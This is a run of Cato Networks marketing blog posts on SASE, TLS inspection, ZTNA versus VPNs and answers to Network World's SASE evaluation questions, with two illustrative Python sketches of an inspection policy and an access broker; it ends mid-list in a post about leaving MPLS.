"Before Cato, there were outages, complaints, and negative feedback from several internal teams about the service from our major international MPLS provider," said Thomas Chejfec, Group CIO of Haulotte, a global manufacturer of materials and people lifting equipment. Haulotte moved to Cato after facing three years of delays and cost overruns, rolling out MPLS to its more than 30 offices across Western Europe, North America, South America, Africa, and Asia Pacific. "Since deploying Cato, the network is no longer a topic of discussion with users," says Chejfec. "We never hear about it anymore."
Of course, delivering a great cloud platform means having great partners. Cato's complete range of networking and security capabilities are available today from numerous partners across France, including Ava6, ADVENS, Anetys, Hexanet, IMS Networks, OCD, NEOVAD, Nomios, Rampar, Sasety, and Selceon.
Cato continues to work hard to deliver and grow our global network. Marseilles is our latest launch, but hardly our last. Expect us to continue adding PoPs and growing our global footprint so you can connect and secure your offices and users wherever they may be located.
Don’t Turn a Blind Eye to TLS Traffic
TLS or Transport Layer Security is the evolution of SSL, and the terms are often used interchangeably. TLS is designed to increase security by encrypting data end-to-end between two points, ideally preventing bad actors from having visibility into the traffic of your web session. However, threat actors have also come to see the value in utilizing TLS encryption for delivering malware and evading security controls.
This can be indirect, by leveraging common sanctioned SaaS applications (Office365, Box, Dropbox, GDrive, etc.) as delivery vectors, or direct, by using free certificates from Let’s Encrypt. Let’s Encrypt is a free and open certificate authority created and run for the benefit of the public. Despite being designed for good, threat actors wasted no time in leveraging the advantages of free encryption in their activities.
The point here is that most traffic, good and bad, is now TLS encrypted and can create challenges for IT and security teams.
TLS Inspection to the Rescue
TLS inspection is almost completely transparent to the end-user and sits between the user and their web applications. Like the malicious activity known as a man-in-the-middle attack, TLS inspection intercepts the traffic, enabling inspection by security engines. For this to work without disruption to the end-user, an appropriate certificate must be installed on the client device.
TLS inspection has been available for some time now but isn’t widely used due to a variety of reasons, primarily cost and complexity. Historically NGFW or other appliances have been the source of TLS inspection capabilities for organizations. With any appliance, there is a fixed amount of capability, and the more features you enable, the lower the throughput. TLS inspection is no different and often requires double (or more) hardware investment to accomplish at scale. Additionally, TLS inspection brings up privacy concerns about financial and health information that are not always easily addressed by legacy products.
SASE Makes it Possible
SASE or Secure Access Service Edge removes most of the challenges around TLS decryption, allowing organizations to secure their users and locations more effectively. SASE offers TLS inspection capabilities as product functionality, with no need to size and deploy hardware. Simply create desired exceptions (or alternatively specify what traffic to inspect), deploy certificates to endpoints, and enable the feature. This easy alternative to NGFW TLS decryption makes it possible for organizations to gain visibility into the 95% of their traffic that is hiding in TLS. There are still some challenges, primarily certificate pinned websites and applications. Most SASE providers will manage a bypass list of these for you, but you can always improve your security posture by blocking un-inspectable traffic where it makes sense.
Gain Visibility Today
The question remains: if you are not inspecting TLS today, why aren’t you? You have most likely invested in security technologies such as IPS, CASB, SWG, Next-Generation Antimalware, DLP, etc., but without complete visibility, these tools cannot work effectively. Security engines are a bit like the x-ray machine at airport security: they reveal the contents of luggage (packets) to identify anything bad. Now imagine if you are in the security line and they are only inspecting 5 out of every 100 bags. How secure does this make you feel? Would you still get on the plane?
SASE has removed many of the obstacles to adopting TLS inspection and provides complete visibility to all security engines to maximize their value. If you have not considered SASE yet, now may be the time. If you already have SASE and do not know where to start with TLS inspection, start small. You should be able to selectively enable the capability for risky categories of URLs and applications and then increase the scope as your comfort level grows.
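The staged rollout described above can be modelled as a first-match policy. The following is an added example, not code from the original post or from any vendor's product; every host name, category label and rule in it is a constructed assumption. It shows how exceptions (pinned applications, privacy-sensitive categories) are evaluated before the inspection scope, and how widening the scope changes how much traffic the security engines actually see.

```python
from collections import Counter
from dataclasses import dataclass
from enum import Enum
from fnmatch import fnmatchcase


class Action(Enum):
    INSPECT = "inspect"   # decrypt and hand to the security engines
    BYPASS = "bypass"     # pass through encrypted, unseen by the engines
    BLOCK = "block"       # refuse traffic that cannot be inspected


@dataclass(frozen=True)
class Flow:
    sni: str        # server name taken from the TLS ClientHello
    category: str   # URL category label (hypothetical labels)


# All values below are constructed for illustration.
# Certificate-pinned destinations break under interception, so each one is
# either bypassed (sanctioned for business use) or blocked outright.
PINNED = {
    "*.pinned-sync.example": True,    # sanctioned -> bypass
    "*.pinned-chat.example": False,   # not sanctioned -> block
}
# Categories left encrypted for privacy reasons (financial, health).
PRIVACY_CATEGORIES = frozenset({"finance", "health"})
# Stage 1 scope: start small, with risky categories only.
RISKY_CATEGORIES = frozenset({"uncategorized", "file-sharing", "newly-registered"})


def normalize(sni: str) -> str:
    """Lower-case the name and drop a trailing dot so rules match reliably."""
    return sni.strip().rstrip(".").lower()


def decide(flow: Flow, inspect_scope=RISKY_CATEGORIES) -> Action:
    """First match wins: pinned rules, then privacy bypass, then scope.

    inspect_scope=None means "inspect everything that is not an exception".
    """
    host = normalize(flow.sni)
    for pattern, sanctioned in PINNED.items():
        if fnmatchcase(host, pattern):
            return Action.BYPASS if sanctioned else Action.BLOCK
    if flow.category in PRIVACY_CATEGORIES:
        return Action.BYPASS
    if inspect_scope is None or flow.category in inspect_scope:
        return Action.INSPECT
    return Action.BYPASS


def coverage(flows, inspect_scope=RISKY_CATEGORIES) -> dict:
    """Count how many flows end up inspected, bypassed or blocked."""
    counts = Counter(decide(f, inspect_scope) for f in flows)
    return {action.value: counts.get(action, 0) for action in Action}


# Constructed sample traffic (not real hosts).
SAMPLE_FLOWS = [
    Flow("mail.saas.example", "business"),
    Flow("drive.saas.example", "file-sharing"),
    Flow("cdn.news.example", "news"),
    Flow("x7f3.fresh-domain.example", "newly-registered"),
    Flow("portal.bank.example", "finance"),
    Flow("clinic.health.example", "health"),
    Flow("API.Pinned-Sync.example.", "business"),
    Flow("edge.pinned-chat.example", "uncategorized"),
    Flow("unknown-host.example", "uncategorized"),
    Flow("video.stream.example", "streaming"),
]

if __name__ == "__main__":
    print("stage 1 (risky categories only):", coverage(SAMPLE_FLOWS))
    print("stage 2 (all but exceptions):   ", coverage(SAMPLE_FLOWS, None))
```

Comparing the two stages on your own traffic mix shows how much remains in the bypass bucket, which is the portion the security engines never see.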
See this quick video demo on how easy it is to enable TLS inspection with Cato Networks!
Planning for the Distributed Enterprise of the Future
In the past, most of an organization’s employee and IT resources were located on the enterprise LAN. As a result, enterprise security models were focused on defending the perimeter of the corporate network against external threats. However, the face of the modern enterprise is changing rapidly. Both users and IT resources are moving off of the corporate LAN, creating new employee and service network edges.
Distributed Employee Edges
The most visible sign of the evolution of the modern enterprise is the growing acceptance of remote work. Employees working remotely is nothing new, even for organizations without formal telework programs. Business travel, corporate smartphones, and other factors have led to corporate data and resources being accessed from outside the enterprise network, often without proper support or security.
The pandemic normalized remote work as businesses found that their employees could effectively work from basically anywhere. In fact, many businesses found that remote work increased productivity and decreased overhead. As a result, many businesses plan to support at least hybrid work indefinitely, and telework has become a common incentive for hiring and retaining employees.
Scattered Service Locations
While the rapid growth and distribution of employee edges can be attributed to the pandemic, service edges have been expanding for years. The emergence of cloud-based data storage and application hosting has transformed how many organizations do business.
The cloud provides numerous benefits, but one of its major selling points is the wide range of service options that organizations can take advantage of. Companies can move enterprise data to a cloud data center, outsource infrastructure management to a third-party provider for hosted applications, or take advantage of Software as a Service (SaaS) applications that are developed and hosted by their cloud service provider.
Nearly all organizations use at least some cloud services, even if this is simply cloud-based email and data storage (G-Suite, Microsoft 365, etc.). However, many companies have not completely given up their on-prem infrastructure, hosting some data and applications locally to meet business needs or regulatory compliance requirements.
This mix of on-prem and cloud-based infrastructure complicates the corporate WAN. Both on-site and remote workers need high-performance, reliable, and secure access to corporate data and applications, regardless of where the user and application are located.
Legacy Infrastructure Doesn’t Meet Modern Needs
Many organizations’ security models were designed for the era where employees and corporate IT assets were centralized on the corporate LAN. By deploying security solutions at the perimeter of the corporate network, organizations attempt to detect inbound threats and outbound data exfiltration before they pose a threat to the organization.
The perimeter-focused security model has many shortcomings, but one of the most significant is that it is designed for an IT infrastructure that no longer exists. With the expansion of telework and cloud computing, a growing percentage of an organization’s IT assets are now located outside the protected perimeter of the corporate LAN.
A major challenge that companies face when adapting to the growing distribution of their IT assets is that many of the tools they are trying to use are designed for the same outdated model. For example, virtual private networks (VPNs) were designed to provide point-to-point secure connectivity, such as between a remote worker and the enterprise network. This design doesn’t work when employees need secure access to resources hosted in various places (on-prem, cloud, etc.).
Trying to support a distributed workforce with legacy solutions creates significant challenges for an organization. VPNs’ design and lack of built-in security and access control result in companies routing all traffic through the corporate network for inspection, resulting in increased latency and degraded performance. It also creates challenges for IT personnel, who need to deploy and maintain complex and inflexible VPN-based corporate WANs.
ZTNA Enables Usable, Scalable Security
As companies’ workforces and infrastructure become more distributed, attempting to make the corporate WAN work with legacy solutions is not a sustainable long-term plan. A switch away from perimeter-focused technologies like VPNs is essential to the performance, reliability, and security of the enterprise network.
Zero trust network access (ZTNA) offers a superior alternative to VPNs that is better suited to the needs of the distributed enterprise of the future. Some advantages of a cloud-based ZTNA deployment include:
Global Accessibility: ZTNA can be hosted in the cloud, making it globally accessible. Once access decisions are made, traffic can be routed directly to its destination without a detour through the corporate network.
Granular Access Controls: VPNs are designed to provide legitimate users with unrestricted access to corporate resources. ZTNA provides access to a specific resource on a case-by-case basis, enabling more granular access management and better enforcement of least privilege.
Centralized Management: A VPN-based WAN for an organization with multiple sites and cloud-based infrastructure requires many independent links between different sites. ZTNA does not require these independent tunnels and can be centrally monitored and managed, simplifying network and security configuration and management.
Private Backbone: Cato’s ZTNA uses a private backbone to route traffic between sites. This improves the performance and reliability of network traffic beyond what is possible with the public Internet.
Solutions like VPNs are designed for an IT architecture that no longer exists and never will again. As companies adopt cloud computing and remote work they need infrastructure and security solutions designed for a distributed IT architecture. By deploying ZTNA with Cato, companies can improve network performance and security while simplifying management.
Overcoming ZTNA Deployment Challenges with the Right Solution
Zero-trust network access (ZTNA) is a superior remote access solution compared to virtual private networks (VPNs) and other legacy tools. However, many organizations are still relying on insecure and non-performant solutions rather than making the switch to ZTNA.
Why You Might Not Be Using ZTNA (But Should Be)
Often, companies have legitimate reasons for not adopting ZTNA - and below we take a closer look at some of the most common concerns:
“A VPN is Good Enough”
One of the simplest reasons why an organization may not want to upgrade their VPN to ZTNA is that they’ve always used a VPN and it has worked for them. If remote users can connect to the resources that they need, then it may be difficult to make a compelling case for a switch. However, even if an organization’s VPN infrastructure is performing well, there is still security to consider.
A VPN is designed to provide a remote user with unrestricted, private access to the corporate network. This means that VPNs lack application-level access controls and integrated security. For this reason, cybercriminals commonly target VPNs because a single set of compromised credentials can provide all of the access needed for a data breach, ransomware infection, or other attacks.
In contrast, ZTNA provides access on a case-by-case basis decided based on user and application-level access controls. If an attacker compromises a user’s account, then their access and the damage that they can do is limited by that user’s permissions.
“ZTNA is Hard to Deploy”
Deploying a new security solution can be a headache for an organization’s security team. They need to integrate it into an organization’s existing architecture, design a deployment process that limits business disruption, and perform ongoing configuration and testing to ensure that the solution works as designed. When an organization has a working VPN solution, then the overhead associated with switching to ZTNA may not seem worth the effort.
While installing ZTNA as a standalone solution may be complex, deploying it as part of a Secure Access Service Edge (SASE) solution can streamline the process. With a managed SASE solution, deployment only requires pointing infrastructure to the nearest SASE point of presence (PoP) and implementing the required access controls.
“VPNs are Required for Compliance”
Most companies are subject to various data protection and industry regulations. Often, these regulations mandate that an organization have certain security controls in place and may recommend particular solutions. For secure remote access, VPNs are commonly on the list of acceptable solutions due to their age and widespread adoption.
However, regulations are changing rapidly, and the limitations of VPNs are well known. As regulators start looking for and mandating a zero-trust approach to security within organizations, solutions like VPNs, which are not designed for zero trust, will be phased out of regulatory guidance.
While regulations still allow VPNs, many also either explicitly recommend ZTNA or allow alternative solutions that implement the required security controls. ZTNA provides all of the same functionality as VPNs but also offers integrated access control. When deployed as part of a SASE solution, ZTNA is an even better fit for regulatory requirements due to its integration with other required security controls and its adoption of the least-privilege methodology commonly required by regulatory frameworks such as UK NCSC Cyber Essentials and NIST. For organizations looking to achieve and maintain compliance with applicable regulations, making the move to ZTNA as soon as possible will decrease the cost and effort of doing so.
“We’ve Already Invested in Our VPN Infrastructure”
VPNs have been around for a while, so many organizations have existing VPN deployments. When the pandemic drove a move to remote work, the need to deploy remote work solutions as quickly as possible led many organizations to expand their existing VPN infrastructure rather than investigate alternatives. As a result, many organizations have invested in a solution that, to a certain degree, meets their remote work needs. These sunk costs can make ripping out and upgrading VPN infrastructure an unattractive proposition.
However, the differential in functionality between a VPN and a ZTNA solution can far outweigh these costs. ZTNA provides integrated access management, which can reduce the cost of a data breach and simplify an organization’s regulatory compliance strategy. A ZTNA solution that successfully prevents a data breach by blocking unauthorized access to sensitive data may have just paid for itself.
“Our Security Team is Already Overwhelmed with Our Existing Solutions”
Many organizations’ security teams are struggling to keep up. The cybersecurity skills gap means that companies are having trouble finding and retaining the skilled personnel that they need, and a sprawling array of security solutions creates overwhelming volumes of alerts and the need to configure, monitor, and manage various standalone solutions. As a result, the thought of deploying, configuring, and learning to use yet another solution may seem less than appealing.
Yet one of the main advantages of ZTNA is that it simplifies security monitoring and management, especially when deployed as part of a SASE solution. By integrating multiple security functions into a single network-level solution, SASE eliminates redundant solutions and enables security monitoring and management to be performed from a single console. By reducing the number of dashboards and alerts that analysts need to handle, SASE reduces the burden on security teams, enabling them to better keep up with an accelerating threat landscape and expanding corporate IT infrastructure.
ZTNA is the Future of Remote Access
Many organizations have solutions that - on paper - provide the features and functionality that they need to support a remote workforce and provide secure access to corporate applications. However, legacy solutions like VPNs lack critical access controls and security features that leave an organization vulnerable to attack.
As the zero trust security model continues to gain momentum and is incorporated into regulations, organizations will need solutions that meet their security needs and regulatory requirements. ZTNA meets these needs, especially as part of a SASE solution.
How to Buy SASE: Cato Answers Network World’s 18 Essential Questions
Last December, Network World published a thoughtful guide outlining the questions IT organizations should be asking when evaluating SASE platforms. It was an essential list that should be included in any SASE evaluation.
Too often, SASE is a marketing term applied to legacy point solutions, which is why we suspect these questions are even needed. By contrast, The Cato SASE Cloud is the world's first cloud-native SASE platform, converging SD-WAN and network security in the cloud. Cato Cloud connects all enterprise network resources including branch locations, the mobile workforce, and physical and cloud data centers, into a global and secure, cloud-native network service. With all WAN and Internet traffic consolidated in the cloud, Cato applies a suite of security services to protect all traffic at all times. In short, Cato provides all of the core SASE capabilities identified by NWW.
We are pleased to respond point-by-point to every issue raised. You should also check out our SASE RFP template to help with the evaluation.
1. Does the vendor offer all of the capabilities that are included in the definition of SASE? If not, where are the gaps? If the vendor does claim to offer all of the features, what are the strengths and weaknesses? How does the maturity of the vendor offerings mesh or clash with your own strengths, weaknesses, and priorities? In other words, if your biggest need is Zero Trust, and the vendor's strength is SD-WAN, then the fit might not be right.
Yes, Cato provides all of the core capabilities NWW defines for SASE – and more. On the networking side, the Cato Global Private backbone connects 70+ PoPs worldwide. Locations automatically connect to the nearest PoP with our edge SD-WAN device, the Cato Socket. Cloud datacenters are connected via an agentless configuration, and cloud applications are connected through our cloud-optimized routing. Remote users connect in by using the Cato Mobile Client or clientless browser access.
On the security side, Cato Security as a Service is a fully managed suite of enterprise-grade and agile network security capabilities, directly built into the Cato Global Private Backbone. Current security services include firewall-as-a-Service (FWaaS), secure web gateway with URL filtering (SWG), standard and next-generation anti-malware (NGAM), IPS-as-a-Service (IPS), Cloud Access Security Broker (CASB), and a Managed Threat Detection and Response (MDR) service.
2. How well integrated are the multiple components that make up the SASE? Is the integration seamless?
The Cato SASE Cloud is completely converged. The Cato SPACE architecture is a single software stack running in our PoPs. Enterprises manage and monitor networking, security, and access through a single application. All capabilities are available in context via a shared user interface. Objects created in one domain (such as security) are available in other domains (such as networking or remote access). (To see what we mean by seamless, check out this detailed walkthrough of the Cato Management Application.)
3. Assuming the vendor is still building out its SASE, what does the vendor roadmap look like? What is the vendor's approach in terms of building capabilities internally or through acquisition? What is the vendor's track record integrating past acquisitions? If building internally, what is the vendor's track record of hitting its product release deadlines?
Cato has demonstrated its ability to develop and bring capabilities to market. Since its founding in 2015, Cato has successfully developed and delivered the global SASE cloud, which is used today by more than 1000 enterprises. We regularly add new services and capabilities to our platform, such as December's announcement of more than 103 frontend improvements and updates to our backend event architecture. (Other additions included a Cloud Application catalog, a Threats dashboard, an Application Analytics dashboard, CASB launch, and updates to our managed detection and response (MDR) service that automated security assessments.)
4. Whose cloud is it anyway? Does the vendor have its own global cloud, or are they partnering with someone? If so, how does that relationship work in terms of accountability, management, SLAs, troubleshooting?
Cato owns and maintains the Cato SASE Cloud. The PoPs are on our hardware hosted in tier-3 datacenters, running Cato's cloud-native software stack. Every PoP is connected by at least two and many by four tier-1 carriers, who provide SLA-backed capacity. Cato's custom routing software constantly evaluates these paths identifying the shortest path for each packet.
Questions for MSPs
Network World also included a series of questions specific to managed service providers (MSPs). Cato, in addition to building a SASE platform, is also a service provider, so we took the liberty of responding to these questions as well.
1. How many PoPs do they have and where are they located? Does the vendor cloud footprint align with the location of your branch offices?
The Cato Global Private backbone currently serves 140 countries worldwide from more than 70 PoPs that we continue to expand each quarter.
2. Does the vendor have the scale, bandwidth, and technical know-how to deliver line-rate traffic inspection?
Thanks to our highly scalable cloud-native architectures, the Cato Cloud delivers line-rate performance regardless of whether traffic is encrypted or unencrypted or the number of security operations performed. PoPs have enough spare capacity to accommodate traffic surges. Case in point was how our Manchester PoP accommodated additional traffic during the Interxion outage.
3. For the cloud-native vendors: How can you demonstrate that your homegrown SASE tools stack up against, say, the firewall functionality from a name-brand firewall vendor?
Cato can fully replace branch office firewalls and, usually, datacenter firewalls. Moreover, the convergence of capabilities allows us to deliver security capabilities and visibility impossible with legacy point solutions. For example, we can use data science and machine learning algorithms on networking data to spot security threats before they can exfiltrate data. The company was founded by security luminary Shlomo Kramer, co-founder of Check Point Software. It taps some of the brightest minds in cybersecurity that Israel has to offer. You're welcome to try out our platform and see for yourself.
4. Is there a risk that the vendor might be an acquisition target? As the market continues to heat up, further acquisitions seem likely, with the bigger players possibly gobbling up the cloud-native newcomers.
Cato is a well-established company with well over 1,100 enterprise customers committed to serving the needs of those customers for the long term. We've raised over $500 million in venture capital resulting in a private $2.5 billion valuation.
5. For the traditional managed services powerhouses like AT&T and Verizon, do they have all the SASE capabilities, where did they get them, and how well are they integrated? What is the process for troubleshooting, SLAs, and support? Is there a single management dashboard?
Cato, just like any cloud service provider, enables organizations to co-manage their own Cato implementation while Cato maintains the underlying infrastructure. IT teams can opt to manage infrastructure themselves, outsource a subset of responsibilities to a Cato partner, or have a Cato partner fully manage the infrastructure. There's always 24x7 support available.
6. Is there flexibility in terms of policy enforcement? In other words, can a consistent SASE security policy be applied across the entire global enterprise, and can that policy also be enforced locally depending on business policy and compliance requirements?
Yes, customers apply a consistent security policy across the enterprise. In fact, enterprises have full control over their security policies. We instantiate the most commonly used security policies at startup, so most customers require little or no changes. The policy set is instantly applied across the global enterprise or to a specific site or user depending on requirements. Enterprises can, of course, add/change policies as necessary.
7. Even if enforcement nodes are localized, is there a SASE management control plane that enables centralized administration? This administrative interface should allow security and network policy to be managed from a single console and applied regardless of the location of the user, the application, or the data.
Cato provides centralized administration via our management application. Both security and network policies are managed from the same interface for all Cato-connected users and resources, whether they exist in the office, on the road, at home, or in the cloud.
8. How is sensitive data handled? What are the capabilities in terms of visibility, control and extra protection?
Cato encrypts and protects all data in transit and at rest within the Cato network. Designated applications or data flows that contain sensitive information can also remain encrypted if required in a way that bypasses Cato inspection engines.
9. Is policy enforced consistently across all types of remote access to enterprise resources, whether those resources live in the public internet, in a SaaS application, or in an enterprise app that lives on-premises or in an IaaS setting?
Part of what makes Cato unique is that all inspection engines and network capabilities operate on both northbound traffic to the Internet and east-west traffic to other Cato-connected resources. Our CASB, for example, inspects all Internet and cloud-based traffic. Security capabilities continue to perform well on east-west traffic regardless of the user's location due to the Cato global private backbone and our distributed cloud architecture.
10. Is policy enforced consistently for all possible access scenarios--individual end users accessing resources from a home office or a remote location, groups of users at a branch office, as well as edge devices, both managed and unmanaged?
Cato uses a single policy set for all access scenarios.
11. Is the network able to conduct single-pass inspection of encrypted traffic at line rate? Since the promise of SASE is that it combines multiple security and policy enforcement processes, including special treatment of sensitive data, all of that traffic inspection has to be conducted at line speed in a single pass in order to provide the user experience that customers demand.
Cato uses a single-pass inspection engine that can operate at line rate even on encrypted traffic. Thousands of Cato SPACEs enable the Cato SASE Cloud to deliver the full set of networking and security capabilities to any user or application, anywhere in the world at cloud scale using a service that is both self-healing and self-maintaining.
12. Is the SASE service scalable, elastic, resilient, and available across multiple PoPs? Be sure to pin the service provider down on contractually enforced SLAs.
The Cato SASE Cloud is a fully distributed, self-healing service that includes many tiers of redundancy. If the core processing a flow fails, the flow will be handled by one of the other cores in the compute node. Should a compute node fail, other compute nodes in the Cato PoP assume the operation. Should the PoP become inaccessible, Cato has 70+ other PoPs available that enable users to automatically reconnect to the next best available PoP. Enterprises do not need to do any of the high availability (HA) planning that is typically required when relying on virtual appliances to deliver SASE services.
We have 99.999% uptime SLAs with our carriers. Should one of the tier-1 carriers connecting our PoPs experience an outage or slowdown, Cato's routing software detects the change and automatically selects the next best path from one of two other carriers connecting our PoPs. Should the entire Cato backbone (that's right, all 70+ PoPs) somehow disappear one day, Cato Sockets will automatically bring up a peer-to-peer network.
13. One of the key concepts of zero trust is that end-user behavior should be monitored throughout the session and actions taken to limit or deny access if the end user engages in behavior that violates policy. Can the SASE enforce those types of actions in real time?
Cato inspects device posture first upon connecting to the network, ensuring the device meets predefined policy requirements and then continues to monitor the device once connected.
Should a key variable change, such as an anti-malware engine expiring, the device can be blocked from the network or provided limited access depending on corporate requirements. As users connect to cloud application resources, Cato inspects traffic flows. Dozens of actions within applications can be blocked, enabled, or otherwise monitored and reported, such as uploading files or giving write access to key applications.
14. Will the SASE deliver a transparent and simplified end user experience that is the same regardless of location, device, OS, browser, etc.?
The Cato experience remains consistent regardless of operating system. Mobile users can be given clientless access or client-based access with the Cato Mobile Client. The Cato Mobile Client is available for all major enterprise platforms including Windows, macOS, Android (also supported for ChromeOS), iOS, and Linux. Users within the locations connected by Cato Sockets, Cato's edge SD-WAN device, log into their network as usual with no change.
Once connected to the Cato SASE Cloud, all security inspection is done locally at the connected PoP, eliminating the traffic backhaul that so often degrades the performance of mobile users situated far from their offices. The Cato Global Private Backbone uses optimized routing to minimize latency and WAN optimization to maximize throughput. The result is a remote user experience that's as close as possible to being inside the office.
Other Questions to Explore
We applaud Network World for raising these issues. Some other questions we might encourage IT teams to ask MSPs include:
High Availability (HA): Take a close look at how HA is delivered by the vendor. What's the additional cost involved with deploying the secondary appliance? How are the SD-WAN devices configured and deployed? With most enterprises, HA has become the de facto edge configuration to ensure the high uptime they're looking for, particularly when replacing MPLS.
What happens when there is a lockup rather than just an outage? Will the system fail over properly?
What about the underlying memory, storage, and server system underpinning what are often virtual appliances?
What happens if the PoP itself becomes inaccessible?
The list goes on. The secure Cato SASE platform is based on a fully distributed self-healing network built for the cloud era that we manage 24/7 on behalf of our customers. Anything less than that from our perspective simply isn't SASE.
Why Moving to ZTNA Provides Benefits for Both MSPs and Their Customers
The pandemic underscored the importance of secure remote access for organizations. Even beyond the events of these past years, remote work has been normalized and has become an incentive and negotiating point for many prospective hires.
However, many organizations are still reliant on legacy remote access solutions, such as virtual private networks (VPNs), that are not designed for the modern, distributed enterprise. Upgrading to zero trust network access (ZTNA) provides numerous benefits to these organizations.
Main Benefits of ZTNA for MSPs
For Managed Service Providers (MSPs) offering remote access services, making the move to ZTNA can significantly help their customers. However, it is not just the customer who benefits. An MSP that makes ZTNA part of its service offering can reap significant benefits, especially if it is deployed as part of a Secure Access Service Edge (SASE) offering. Let’s take a closer look at some of the key benefits:
Tighter Security Controls
VPNs are designed solely to provide a secure network link between two points. VPNs have no built-in traffic inspection capabilities and provide users with unrestricted access to corporate resources.
By using VPNs for secure remote access, organizations expose themselves to various cyber threats. Cyber threat actors commonly target VPNs with credential stuffing attacks, hoping to take advantage of compromised credentials to gain full access to the enterprise network. VPNs are also prone to vulnerabilities that attackers can exploit to bypass access controls or eavesdrop on network traffic.
ZTNA provides the same remote access capabilities as VPNs but does so on a case-by-case basis that allows effective implementation of least privilege access controls. By deploying ZTNA to customer environments, MSPs can reduce the occurrence and impact of security incidents. This results in an improved customer experience and reduced costs of recovery.
Improved Visibility and Control
VPNs provide unrestricted access to the corporate network, providing a user experience similar to working from the office. Since VPNs don’t care about the eventual destination of network traffic, they don’t collect this information. This provides an organization or their MSP with limited visibility into how a VPN is being used.
ZTNA provides access to corporate resources on a case-by-case basis. These access decisions are made based on the account requesting the access, the resource requested, and the level of access requested. Based on this data and an organization’s access controls, access is permitted or denied.
ZTNA performs more in-depth traffic inspection and access management as part of its job, and these audit logs can provide invaluable visibility to an MSP. With the ability to see which accounts are remotely accessing various resources, an MSP can more easily investigate potential security incidents, identify configuration errors and other issues, and strategically allocate resources based on actual usage of IT infrastructure and assets.
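The per-request decision and the audit trail described above can be sketched as follows. This is an added example, not any vendor's implementation; the `AccessBroker` class, the accounts, resources, access levels and request stream are all constructed for illustration.

```python
from collections import Counter
from dataclasses import dataclass

# Access levels, least to most privileged (constructed for this example).
LEVELS = {"read": 1, "write": 2, "admin": 3}


@dataclass(frozen=True)
class Grant:
    account: str
    resource: str
    max_level: str


# Constructed policy: anything not listed here is denied.
POLICY = [
    Grant("alice", "crm", "write"),
    Grant("alice", "wiki", "read"),
    Grant("bob", "wiki", "write"),
]

# Constructed request stream: (account, resource, requested level).
SAMPLE_REQUESTS = [
    ("alice", "crm", "read"),
    ("alice", "crm", "admin"),
    ("alice", "hr-db", "read"),
    ("bob", "wiki", "write"),
    ("mallory", "crm", "read"),
    ("mallory", "hr-db", "read"),
    ("bob", "wiki", "delete"),
]


class AccessBroker:
    """Decides each request on its own and records every decision."""

    def __init__(self, policy):
        self.grants = {(g.account, g.resource): LEVELS[g.max_level] for g in policy}
        self.audit_log = []

    def decide(self, account, resource, level):
        requested = LEVELS.get(level)  # None for an unknown level
        granted = self.grants.get((account, resource), 0)  # 0 means no grant
        if requested is None:
            allowed, reason = False, "unknown access level"
        elif granted == 0:
            allowed, reason = False, "no grant for this resource"
        elif requested > granted:
            allowed, reason = False, "requested level exceeds grant"
        else:
            allowed, reason = True, "within grant"
        # Denials are logged as well: they are where an investigation starts.
        self.audit_log.append({
            "account": account, "resource": resource, "level": level,
            "allowed": allowed, "reason": reason,
        })
        return allowed

    def denied_by_account(self):
        """Count of denied requests per account, for spotting probing or misconfiguration."""
        return dict(Counter(e["account"] for e in self.audit_log if not e["allowed"]))

    def resources_reached(self, account):
        """Resources an account was actually allowed to reach."""
        return {e["resource"] for e in self.audit_log
                if e["account"] == account and e["allowed"]}


def replay(requests, policy=POLICY):
    """Run a request stream through a fresh broker and return it with its audit log."""
    broker = AccessBroker(policy)
    for account, resource, level in requests:
        broker.decide(account, resource, level)
    return broker


if __name__ == "__main__":
    broker = replay(SAMPLE_REQUESTS)
    for entry in broker.audit_log:
        print(entry)
    print(broker.denied_by_account())
```

A VPN in the model the text describes would have no equivalent of `audit_log`: once the tunnel is up, there is no per-resource decision to record.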
Improved Customer Satisfaction
During the pandemic, the performance and scalability limitations of VPNs were laid bare for all to see. Many organizations needed to rapidly shift from mostly on-site to remote work within a matter of weeks. To do so, they often deployed or expanded VPN infrastructure to support a workforce much larger than existing solutions were designed to handle.
However, VPNs scale poorly and can create significant performance issues. Remote access deployments built on VPNs overwhelmed existing network infrastructure, created significant latency, and offered poor support for the mobile devices that remote workers are increasingly using to do their jobs. During the pandemic, employees experienced significant network latency as traffic to cloud-based applications and data storage was backhauled through on-prem data centers by VPN appliances. As a result, employees commonly sought workarounds - such as downloading sensitive data to devices for easier access or using unapproved services - in order to do their jobs.
ZTNA solutions provide optimized performance and better security by moving away from the perimeter-focused security model of VPNs. As corporate infrastructure and resources move to the cloud, employees need high-performance access to SaaS solutions, and routing traffic to these solutions via the corporate network makes no sense. ZTNA makes it possible to perform access management in the cloud and improve the user experience.
For MSPs, improving the end user experience also improves the experience of their customers, who need to listen to employees’ complaints about performance and latency issues. Additionally, ZTNA enables an MSP to eliminate inefficient routing, which creates unnecessary load on their infrastructure and can make it more difficult to meet customer expectations for network performance.
VPNs provide bare-bones network connectivity for remote users. If an organization wants additional access control or to secure the traffic flowing over the VPN connection, this requires additional standalone solutions.
By making the move from VPNs to ZTNA for secure remote access, an MSP can expand the services offered to their customers with minimal additional overhead. ZTNA offers access management, and so can an MSP. The data generated by ZTNA can be processed and displayed on dashboards for customers looking for additional insight into their network usage or security. MSPs can provide ongoing support services for the management and maintenance of ZTNA solutions.
SASE Supercharges ZTNA
Making the move to ZTNA for their secure remote access offerings makes logical sense for MSPs. ZTNA provides more functionality, better performance and security, and simpler management and maintenance than VPN-based infrastructure.
However, the benefits of ZTNA can be dramatically expanded by deploying it as part of a SASE solution. SASE is deployed as a network of cloud-based points of presence (PoPs) with dedicated, high-performance network links between them. Each SASE PoP integrates ZTNA with other security and network optimization features, providing high-performance and reliable connectivity and enterprise-grade security for the corporate WAN.
Making the move to ZTNA streamlines and optimizes an MSP’s remote access services offering. Deploying it with SASE does the same for an MSP’s entire network and security services portfolio.
IT Managers: Read This Before Leaving Your MPLS Provider
Maybe you’re an IT manager or a network engineer. It’s about a year before your MPLS contract expires, and you’ve been told to cut costs by your CFO.
“That MPLS – too expensive. Find an alternative.”
This couldn’t have come at a better time...
Employees have been blowing up the helpdesk, complaining about slow internet, laggy Zoom calls and demos that disconnect with prospects. Naturally, it’s your job to find a solution...
There actually could be several reasons why it’s time to pull the plug on your MPLS, or at least, consider MPLS alternatives.
1. Get crystal clear on your WAN challenges:
Do any of these challenges sound familiar?
A. You’ve been told to cut costs
